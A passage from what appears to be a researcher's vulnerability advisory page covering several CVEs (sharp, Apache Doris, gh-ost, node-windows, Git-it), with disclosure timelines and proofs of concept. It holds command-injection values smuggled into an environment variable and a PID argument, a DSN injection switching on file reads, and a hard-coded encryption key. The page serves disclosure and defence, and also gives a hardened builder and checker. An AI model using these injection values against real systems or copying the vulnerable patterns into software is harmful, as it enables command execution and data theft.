<span class="mi">67</span><span class="p">:</span> <span class="k">if</span> <span class="p">(</span><span class="nx">process</span><span class="p">.</span><span class="nx">platform</span> <span class="o">!==</span> <span class="dl">'</span><span class="s1">win32</span><span class="dl">'</span><span class="p">)</span> <span class="p">{</span>
<span class="mi">68</span><span class="p">:</span> <span class="kd">const</span> <span class="nx">globalLibvipsVersion</span> <span class="o">=</span> <span class="nx">spawnSync</span><span class="p">(</span><span class="s2">`PKG_CONFIG_PATH="</span><span class="p">${</span><span class="nx">pkgConfigPath</span><span class="p">()}</span><span class="s2">" pkg-config --modversion vips-cpp`</span><span class="p">,</span> <span class="nx">spawnSyncOptions</span><span class="p">).</span><span class="nx">stdout</span><span class="p">;</span>
<span class="mi">69</span><span class="p">:</span> <span class="cm">/* istanbul ignore next */</span>
<span class="mi">70</span><span class="p">:</span> <span class="k">return</span> <span class="p">(</span><span class="nx">globalLibvipsVersion</span> <span class="o">||</span> <span class="dl">''</span><span class="p">).</span><span class="nx">trim</span><span class="p">();</span>
<span class="mi">71</span><span class="p">:</span> <span class="c1">// SNIPPED</span>
</code></pre></div></div>
<h3 id="occurrences">Occurrences</h3>
<p>Sinks, sorted by backtrace.</p>
<ul>
<li><a href="https://github.com/lovell/sharp/blob/v0.30.4/lib/libvips.js#L68">lib/libvips.js:<code class="language-plaintext highlighter-rouge">68</code></a></li>
<li><a href="https://github.com/lovell/sharp/blob/v0.30.4/lib/libvips.js#L91">lib/libvips.js:<code class="language-plaintext highlighter-rouge">91</code></a></li>
<li><a href="https://github.com/lovell/sharp/blob/v0.30.4/lib/libvips.js#L110">lib/libvips.js:<code class="language-plaintext highlighter-rouge">110</code></a></li>
<li><a href="https://github.com/lovell/sharp/blob/v0.30.4/install/libvips.js#L112">install/libvips.js:<code class="language-plaintext highlighter-rouge">112</code></a></li>
<li><a href="https://github.com/lovell/sharp/blob/v0.30.4/install/can-compile.js#L6">install/can-compile.js:<code class="language-plaintext highlighter-rouge">6</code></a></li>
<li><a href="https://github.com/lovell/sharp/blob/v0.30.4/package.json#L88">package.json:<code class="language-plaintext highlighter-rouge">88</code></a></li>
</ul>
<h2 id="proof-of-concept">Proof of Concept</h2>
<p>The vulnerable function is invoked during the package’s post-installation step.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">export </span><span class="nv">PKG_CONFIG_PATH</span><span class="o">=</span><span class="s1">'"; touch pwned #'</span>
<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-l</span>
total 0
<span class="nv">$ </span>npm <span class="nb">install </span>sharp <span class="nt">--silent</span>
sharp: Using cached /home/dw1/.npm/_libvips/libvips-8.12.2-linux-x64.tar.br
sharp: Integrity check passed <span class="k">for </span>linux-x64
+ sharp@0.30.4
added 67 packages from 204 contributors and audited 67 packages <span class="k">in </span>5.919s
8 packages are looking <span class="k">for </span>funding
run <span class="sb">`</span>npm fund<span class="sb">`</span> <span class="k">for </span>details
found 0 vulnerabilities
<span class="nv">$ </span>find <span class="nb">.</span> <span class="nt">-name</span> <span class="s2">"pwned"</span>
./node_modules/sharp/pwned
</code></pre></div></div>
<h2 id="impact">Impact</h2>
<p>This issue leads to arbitrary command execution.</p>
<h2 id="timeline">Timeline</h2>
<ul>
<li>20 May 2022: Asked for the proper contact for disclosure.</li>
<li>23 May 2022: Vulnerability reported to code owner.</li>
<li>23 May 2022: Report acknowledged & vulnerability patched.</li>
<li>25 May 2022: Vulnerability disclosed.</li>
</ul>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/lovell/sharp/security/advisories/GHSA-gp95-ppv5-3jc5">GHSA-gp95-ppv5-3jc5</a></li>
<li><a href="https://github.com/lovell/sharp/commit/a6aeef612be50f5868a77481848b1de674216f0c">lovell/sharp@<code class="language-plaintext highlighter-rouge">a6aeef6</code></a></li>
</ul>
<p>Author: dwisiswant0</p>
<h1>CVE-2022-23942: Hard-coded Credentials in Apache Doris</h1>
<p>Published 2022-03-10. Permalink: <a href="/CVE-2022-23942">/CVE-2022-23942</a></p>
<h2 id="description">Description</h2>
<p>Apache Doris uses a hardcoded key and IV to initialize the cipher that protects the LDAP password, which may lead to information disclosure.</p>
<h2 id="proof-of-concept">Proof of Concept</h2>
<p>In <a href="https://github.com/apache/incubator-doris/blob/9ca369aa58ef6215e2c79b14fc1b4edfc2e2d720/fe/fe-core/src/main/java/org/apache/doris/common/util/SymmetricEncryption.java#L38-L48"><code class="language-plaintext highlighter-rouge">org.apache.doris.common.util.SymmetricEncryption</code></a> the cipher is initialized with a hardcoded
key and IV:</p>
<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="kd">private</span> <span class="kd">static</span> <span class="kt">byte</span><span class="o">[]</span> <span class="n">key</span> <span class="o">=</span> <span class="o">{</span> <span class="mh">0x56</span><span class="o">,</span> <span class="mh">0x73</span><span class="o">,</span> <span class="mh">0x36</span><span class="o">,</span> <span class="mh">0x68</span><span class="o">,</span> <span class="mh">0x4b</span><span class="o">,</span> <span class="mh">0x56</span><span class="o">,</span> <span class="mh">0x27</span><span class="o">,</span> <span class="mh">0x67</span><span class="o">,</span> <span class="mh">0x24</span><span class="o">,</span> <span class="mh">0x46</span><span class="o">,</span> <span class="mh">0x77</span><span class="o">,</span> <span class="mh">0x57</span><span class="o">,</span> <span class="mh">0x75</span><span class="o">,</span> <span class="mh">0x5a</span><span class="o">,</span>
<span class="mh">0x46</span><span class="o">,</span> <span class="mh">0x74</span> <span class="o">};</span>
<span class="kd">private</span> <span class="kd">static</span> <span class="kd">final</span> <span class="nc">Cipher</span> <span class="nf">getCipher</span><span class="o">(</span><span class="kt">int</span> <span class="n">cipherMode</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">InvalidAlgorithmParameterException</span><span class="o">,</span>
<span class="nc">InvalidKeyException</span><span class="o">,</span> <span class="nc">NoSuchPaddingException</span><span class="o">,</span> <span class="nc">NoSuchAlgorithmException</span><span class="o">,</span> <span class="nc">UnsupportedEncodingException</span> <span class="o">{</span>
<span class="nc">Cipher</span> <span class="n">cipher</span> <span class="o">=</span> <span class="nc">Cipher</span><span class="o">.</span><span class="na">getInstance</span><span class="o">(</span><span class="s">"AES/CFB/PKCS5Padding"</span><span class="o">);</span>
<span class="kd">final</span> <span class="nc">SecretKeySpec</span> <span class="n">secretKey</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">SecretKeySpec</span><span class="o">(</span><span class="n">key</span><span class="o">,</span> <span class="s">"AES"</span><span class="o">);</span>
<span class="nc">IvParameterSpec</span> <span class="n">ivSpec</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">IvParameterSpec</span><span class="o">(</span><span class="s">"AAAAAAAAAAAAAAAA"</span><span class="o">.</span><span class="na">getBytes</span><span class="o">(</span><span class="s">"UTF-8"</span><span class="o">));</span>
<span class="n">cipher</span><span class="o">.</span><span class="na">init</span><span class="o">(</span><span class="n">cipherMode</span><span class="o">,</span> <span class="n">secretKey</span><span class="o">,</span> <span class="n">ivSpec</span><span class="o">);</span>
<span class="k">return</span> <span class="n">cipher</span><span class="o">;</span>
<span class="o">}</span>
</code></pre></div></div>
<h2 id="timeline">Timeline</h2>
<ul>
<li>14 Jan 2022: Vulnerability reported.</li>
<li>14 Jan 2022: Apache Security Team acknowledged the report.</li>
<li>28 Jan 2022: Vulnerability fixed & announcement drafted.</li>
<li>28 Feb 2022: No updates.</li>
<li>10 Mar 2022: Vulnerability disclosed.</li>
</ul>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/apache/incubator-doris/pull/7862">apache/incubator-doris#7862</a></li>
</ul>
<p>Author: dwisiswant0</p>
<h1>CVE-2022-21687: DSN Injection in gh-ost</h1>
<p>Published 2022-01-31. Permalink: <a href="/CVE-2022-21687">/CVE-2022-21687</a></p>
<h2 id="description">Description</h2>
<p>gh-ost is a triggerless online schema migration solution for MySQL. Versions prior to 1.1.3 are subject to an arbitrary file read vulnerability. The attacker must have access to the target host or trick an administrator into executing a malicious gh-ost command on a host running gh-ost, plus network access from the host running gh-ost to the attacker’s malicious MySQL server. The <code class="language-plaintext highlighter-rouge">-database</code> parameter does not properly sanitize user input, which can lead to arbitrary file reads.</p>
<h2 id="proof-of-concept">Proof of Concept</h2>
<p>Vulnerable code: <a href="https://github.com/github/gh-ost/blob/40acde022213c98a09e7f01cc18adf79fafd0170/go/mysql/connection.go#L122">go/mysql/connection.go:122</a></p>
<p><img src="https://i.ibb.co/YP05qcr/gh-ost-sqli.gif" alt="PoC" /></p>
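<p>The same defect underlies gh-ost’s <code>-database</code> parameter and the TiDB importer’s <code>config.toml</code> <code>name</code> field shown earlier (which the Go <code>createDB</code> function pastes into a <code>Sprintf</code> format): a database name lands in the <code>dbname</code> position of the go-sql-driver DSN <code>user:password@tcp(host:port)/dbname?params</code>, so a name containing <code>?</code> reaches the driver’s parameter section and can switch on <code>allowAllFiles</code>. The following is an added example, not code from TiDB or gh-ost, written in JavaScript for consistency with the other examples on this page; the <code>cfg</code> field names and the identifier rule are assumptions. It rebuilds the DSN shape, shows where the injected parameter ends up, and gives a validating builder plus a check a reviewer can run over any DSN before it reaches the driver.</p>

```javascript
// Vulnerable shape (same structure as the importer's createDB): the database
// name is interpolated verbatim, so "test?allowAllFiles=true&" from the PoC's
// config.toml becomes part of the DSN parameter section.
function buildDsnUnsafe(cfg) {
  return `${cfg.user}:${cfg.password}@tcp(${cfg.host}:${cfg.port})/${cfg.name}?charset=utf8`;
}

// Hardened shape: the name must be a plain MySQL identifier (assumed rule:
// letters, digits, "_" and "$", at most 64 chars), the port must be sane, and
// the parameter section is assembled from a fixed allow-list with
// allowAllFiles pinned to false rather than left to the default.
const DB_NAME_RE = /^[A-Za-z0-9_$]{1,64}$/;

function buildDsnSafe(cfg) {
  if (!DB_NAME_RE.test(cfg.name)) {
    throw new Error(`refusing database name ${JSON.stringify(cfg.name)}: not a plain identifier`);
  }
  if (!Number.isInteger(cfg.port) || cfg.port < 1 || cfg.port > 65535) {
    throw new Error(`invalid port ${JSON.stringify(cfg.port)}`);
  }
  const params = new URLSearchParams({ charset: 'utf8', allowAllFiles: 'false' });
  return `${cfg.user}:${cfg.password}@tcp(${cfg.host}:${cfg.port})/${cfg.name}?${params.toString()}`;
}

// Defender's check: split the DSN the way the driver does (database name after
// the last "/", parameters after the first "?" that follows it, pairs split on
// "&") and report whether allowAllFiles is switched on. The driver reads
// "1"/"true" as true; this check accepts those case-insensitively.
function dsnAllowsAllFiles(dsn) {
  const slash = dsn.lastIndexOf('/');
  if (slash === -1) return false;
  const q = dsn.indexOf('?', slash);
  if (q === -1) return false;
  for (const pair of dsn.slice(q + 1).split('&')) {
    const eq = pair.indexOf('=');
    if (eq === -1) continue;
    const key = pair.slice(0, eq);
    const value = pair.slice(eq + 1).toLowerCase();
    if (key === 'allowAllFiles' && (value === 'true' || value === '1')) return true;
  }
  return false;
}

// Constructed config mirroring the values in the PoC's config.toml.
const pocConfig = {
  host: '127.0.0.1',
  port: 3306,
  user: 'root',
  password: '',
  name: 'test?allowAllFiles=true&',
};

function demo() {
  const unsafe = buildDsnUnsafe(pocConfig);
  let safeError = null;
  try {
    buildDsnSafe(pocConfig);
  } catch (e) {
    safeError = e.message;
  }
  return {
    unsafe,
    unsafeAllowsAllFiles: dsnAllowsAllFiles(unsafe),
    safeError,
    safe: buildDsnSafe({ ...pocConfig, name: 'test' }),
  };
}

console.log(demo());
```

<p>In Go the equivalent repair is to fill a <code>mysql.Config</code> struct from the individual config fields and call its <code>FormatDSN</code> method instead of formatting the string by hand; the driver then treats the database name as data rather than as part of the DSN grammar.</p>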
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/github/gh-ost/security/advisories/GHSA-rrp4-2xx3-mv29">GHSA-rrp4-2xx3-mv29</a></li>
</ul>
<p>Author: dwisiswant0</p>
<h1>CVE-2021-45459: OS Command Injection in node-windows</h1>
<p>Published 2021-12-23. Permalink: <a href="/CVE-2021-45459">/CVE-2021-45459</a></p>
<h2 id="description">Description</h2>
<p><code class="language-plaintext highlighter-rouge">lib/cmd.js</code> in the node-windows package before 1.0.0-beta.6 for Node.js allows command injection via the PID parameter.</p>
<h2 id="proof-of-concept">Proof of Concept</h2>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// poc.js</span>
<span class="kd">var</span> <span class="nx">wincmd</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">node-windows</span><span class="dl">'</span><span class="p">);</span>
<span class="nx">wincmd</span><span class="p">.</span><span class="nx">kill</span><span class="p">(</span><span class="dl">"</span><span class="s2">12345; calc.exe</span><span class="dl">"</span><span class="p">,</span> <span class="kd">function</span><span class="p">(){</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">Process Killed</span><span class="dl">'</span><span class="p">);</span>
<span class="p">});</span>
</code></pre></div></div>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/advisories/GHSA-53xv-c2hx-5w6q">GHSA-53xv-c2hx-5w6q</a></li>
<li><a href="https://github.com/coreybutler/node-windows/compare/1.0.0-beta.5...1.0.0-beta.6">coreybutler/node-windows@<code class="language-plaintext highlighter-rouge">1.0.0-beta.5...1.0.0-beta.6</code></a></li>
</ul>
<p>Author: dwisiswant0</p>
<h1>CVE-2021-44685: OS Command Injection in Git-it</h1>
<p>Published 2021-12-07. Permalink: <a href="/CVE-2021-44685">/CVE-2021-44685</a></p>
<h2 id="description">Description</h2>
<p>Git-it through 4.4.0 allows OS command injection at the <strong>Branches Aren’t Just For Birds</strong> challenge step. During the verification process, it attempts to run the <code class="language-plaintext highlighter-rouge">reflog</code> command followed by the current branch name (which is not sanitized for execution).</p>
<h2 id="proof-of-concept">Proof of Concept</h2>
<p><img src="/assets/images/CVE-2021-44685.gif" alt="" /></p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/advisories/GHSA-wjqc-j537-j9gj">GHSA-wjqc-j537-j9gj</a></li>
<li><a href="https://github.com/dwisiswant0/advisory/raw/master/.poc/CVE-2021-44685.mp4">https://github.com/dwisiswant0/advisory/raw/master/.poc/CVE-2021-44685.mp4</a></li>
</ul>
<p>Author: dwisiswant0</p>